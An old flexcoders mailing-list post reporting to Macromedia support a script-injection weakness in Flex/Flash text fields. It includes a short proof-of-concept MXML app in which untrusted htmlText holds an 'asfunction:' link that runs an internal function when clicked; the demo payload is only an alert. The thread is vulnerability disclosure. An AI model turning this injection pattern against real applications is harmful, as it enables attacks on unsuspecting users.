Semantics aside, flex applications tend to promote a type of
interaction that the majority of flash applications (in general) do not.
FYI, I mispoke hugely. The offending command is asfunction, not
fscommand.
Here is a sample exploit. It requires you to trick the user into
clicking a "link". But if you can do that some percent of the time,
with the aid of a flash decompiler to explore the app, you might be
able to do all sorts of interesting things.
<?xml version="1.0" encoding="utf-8"?>
<mx:Application xmlns:mx="http://www.macromedia.com/2003/mxml";
xmlns="*">
<mx:Script>
<![CDATA[
private function hello() {
alert("hello world");
}
private var textFromAnotherUserViaRemoteObject = "Please <u><a
href='asfunction:_parent.hello'>click me</a></u>";
]]>
</mx:Script>
<mx:Text htmlText="{textFromAnotherUserViaRemoteObject}"/>
</mx:Application>
--- In [email protected], John Dowdell <[EMAIL PROTECTED]> wrote:
> The title may be a bit of a misnomer, because Macromedia Flex lives on
> the server, while cross-site scripting exploits would occur on the
> client machines. This seems a sub-class of general security in the
> Macromedia Flash Player rather than the development environment,
true...?
>
> Here's general background info on security and privacy in the
Macromedia
> Flash Player:
> http://www.macromedia.com/devnet/flashplayer/
> ... and here's background on recent security issues in the Macromedia
> Flash Player:
> http://www.macromedia.com/devnet/security/security_zone/#flashplayer
>
> As I understand the post, you're concerned about the possibility of a
> command injection into a textfield of a SWF application. (I could be
> wrong, but it sounded to me more like a script-injection issue than a
> cross-site scripting issue.) Have you been able to see this happen yet?
> have you typed "fscommand:()" into a textfield in a particular
component
> to pop up an alert or such? If there's a recipe that could be
reproduced
> in-house then we can work on it.
>
> Or is it more a general curiosity, about whether there might be a way
> that such a thing is possible....?
>
> tx,
> jd
>
>
>
>
> --
> John Dowdell . Macromedia Developer Support . San Francisco CA USA
> Weblog: http://www.macromedia.com/go/blog_jd
> Aggregator: http://www.macromedia.com/go/weblogs
> Technotes: http://www.macromedia.com/support/
> Spam killed my private email -- public record is best, thanks.
Yahoo! Groups Links
<*> To visit your group on the web, go to:
http://groups.yahoo.com/group/flexcoders/
<*> To unsubscribe from this group, send an email to:
[EMAIL PROTECTED]
<*> Your use of Yahoo! Groups is subject to:
http://docs.yahoo.com/info/terms/
